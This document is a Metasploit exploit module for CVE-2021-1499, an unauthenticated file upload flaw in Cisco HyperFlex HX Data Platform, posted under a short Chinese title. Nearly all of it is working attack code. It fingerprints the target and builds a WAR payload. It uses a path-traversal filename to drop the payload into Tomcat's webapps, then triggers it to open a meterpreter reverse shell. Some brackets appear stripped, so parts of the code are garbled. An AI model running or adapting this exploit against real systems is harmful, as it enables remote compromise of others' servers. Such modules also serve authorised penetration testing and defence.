CVE-2021-1499 Cisco HyperFlex HX Data Platform 文件上传&远程代码执行漏洞/zh-cn

EXP

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)',
        'Description' => %q{
          This module exploits an unauthenticated file upload vulnerability in
          Cisco HyperFlex HX Data Platform's /upload endpoint to upload and
          execute a payload as the Tomcat user.
        },
        'Author' => 
          'Nikita Abramov',      # Discovery
          'Mikhail Klyuchnikov', # Discovery
          'wvu',                 # Research and guidance
          'jheysel-r7'           # Metasploit Module
        ,
        'References' => 
          'CVE', '2021-1499', # HyperFlex HX File Upload
          'URL', 'https://attackerkb.com/assessments/82738621-1114-4aba-990a-9ea007b05834'
        ,
        'DisclosureDate' => '2021-05-05',
        'License' => MSF_LICENSE,
        'Platform' => 'unix', 'linux',
        'Arch' => ARCH_X86, ARCH_X64, ARCH_JAVA,
        'Privileged' => false, # Privesc left as an exercise for the reader
        'Targets' => 
          
            'Java Dropper',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA,
              'Version' => Rex::Version.new('2.137'),
              'Type' => :java_dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'java/meterpreter/reverse_tcp',
                'WfsDelay' => 10
              }
            }
          ,
          
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86, ARCH_X64,
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
                'WfsDelay' => 10
              }
            }
          
        ,
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => CRASH_SAFE,
          'Reliability' => REPEATABLE_SESSION,
          'SideEffects' => IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK
        }
      )
    )
    register_options(
      OptString.new('TARGETURI', true, 'Base path', '/'),
      OptString.new('UPLOAD_FILE_NAME', false, 'Choose a filename for the payload. (Default is random)', rand_text_alpha(rand(8..15)))
    )
  end

  def check
    # The homepage behind SSL indicates whether the endpoint is running Cisco HyperFlex
    # Installer:         <title>Hyperflex Installer</title>
    # Installed Product: <title>Cisco HyperFlex Connect</title>
    # Both the installer and installed product are vulnerable
    res_ssl = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'rport' => 443,
      'SSL' => true
    )
    unless res_ssl && res_ssl.body%r{<title>(?:Hyperflex Installer|Cisco HyperFlex Connect)</title>}
      return Exploit::CheckCode::Safe
    end

    # The vulnerability, however, lies on the HTTP endpoint /upload.
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'upload')
    )
    if res && res.code == 400 && res.body.include?('Apache Tomcat') && res.headers'Server' && res.headers'Server'.include?('nginx')
      return Exploit::CheckCode::Appears
    elsif res && res.code == 404
      return CheckCode::Safe
    end

    CheckCode::Unknown
  end

  def prepare_payload(app_base, jsp_name)
    print_status('Preparing payload...')
    war_payload = payload.encoded_war({ app_name: app_base, jsp_name: jsp_name }).to_s
    fname = app_base + '.war'
    post_data = Rex::MIME::Message.new
    post_data.add_part(fname, nil, nil, 'form-data; name="fname"')
    post_data.add_part('/upload', nil, nil, 'form-data; name="uploadDir"')
    post_data.add_part(war_payload,
                       'application/octet-stream', 'binary',
                       "form-data; name=\"#{jsp_name}\"; filename=\"../../../lib/tomcat7/webapps/#{fname}\"")
    post_data
  end

  def upload_payload(post_data)
    print_status('Uploading payload...')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'upload'),
      'method' => 'POST',
      'data' => post_data.to_s,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    )
    if res && res.code == 200 && res.body.to_s =~ /result.*filename:/
      print_good('Payload uploaded successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed')
    end

    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml.war')
    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
  end

  def execute_payload(url)
    print_status("Executing payload... calling: #{url}")
    res = send_request_cgi(
      'uri' => url,
      'method' => 'GET'
    )
    if res && res.code == 200
      print_good('Payload executed successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed')
    end
  end

  def exploit
    app_base = 'crossdomain.xml'
    jsp_name = datastore'UPLOAD_FILE_NAME'
    data = prepare_payload(app_base, jsp_name)
    upload_payload(data)
    sleep(datastore'WfsDelay')
    if target.name == 'Java Dropper'
      url = normalize_uri(target_uri.path, app_base.to_s)
    else
      url = normalize_uri(target_uri.path, app_base.to_s, "#{jsp_name}.jsp")
    end
    execute_payload(url)
  end
end